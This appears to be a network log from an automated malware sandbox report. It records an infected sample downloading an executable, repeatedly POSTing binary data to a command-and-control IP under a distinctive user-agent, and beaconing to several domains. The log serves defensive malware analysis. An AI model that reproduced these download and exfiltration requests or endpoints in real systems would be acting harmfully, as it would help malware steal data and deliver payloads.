Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=GgD3Fcw+KScOn8zypM5BdJpW3iIUKLxhNIDvUm+FDOYyxu2AFxTq8ZqTICftVViamW1X&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.top-dao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 103.224.212.213 103.224.212.213
Source: Joe Sandbox View	IP Address: 45.61.137.215 45.61.137.215

Source: Joe Sandbox View	ASN Name: UHGL-AS-APUCloudHKHoldingsGroupLimitedHK UHGL-AS-APUCloudHKHoldingsGroupLimitedHK
Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: AS40676US AS40676US

Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 172Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 172Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/3b1tenbkyj HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DCC85916Content-Length: 145Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.61.137.215

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 15_2_00404ED4 recv,

15_2_00404ED4

Source: global traffic	HTTP traffic detected: GET /YLc7afPlL4RjCeK.exe HTTP/1.1Host: mbsngradnja.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=URhw1ZwvIctTGCpPzcTqZFryLoAICCIR37RdTq+D27m0Ed9BTUTA8R/QfR+xv6khW63w&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.imdcaam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.vivaness.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=JxIrrZbNPaA1C4PrhImOUNe+2n/09vmdrEF53puJ8yJ2Z/h/8YXf47jUpRM+pbGXlchT&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.servicepmgtl.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=z1cSYSgDw8EovxWDbEjrEjmudKiJC5ObQGBfFhSW6JRqxrcowHK672c/PJOQREkPG+UN&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.sukhiclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=JJyTLDumWHTBkarN0VPanW2WZHOeobli2nsK+rVOrq2yAp2byhlCx/KUbNmL9DZVQlbp&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.banditsolana.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=GgD3Fcw+KScOn8zypM5BdJpW3iIUKLxhNIDvUm+FDOYyxu2AFxTq8ZqTICftVViamW1X&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.top-dao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: mbsngradnja.com
Source: global traffic	DNS traffic detected: DNS query: www.imdcaam.com
Source: global traffic	DNS traffic detected: DNS query: www.lovedacademy.com
Source: global traffic	DNS traffic detected: DNS query: www.vivaness.club
Source: global traffic	DNS traffic detected: DNS query: www.w937xb.com
Source: global traffic	DNS traffic detected: DNS query: www.servicepmgtl.world
Source: global traffic	DNS traffic detected: DNS query: www.sukhiclothing.com
Source: global traffic	DNS traffic detected: DNS query: www.banditsolana.com
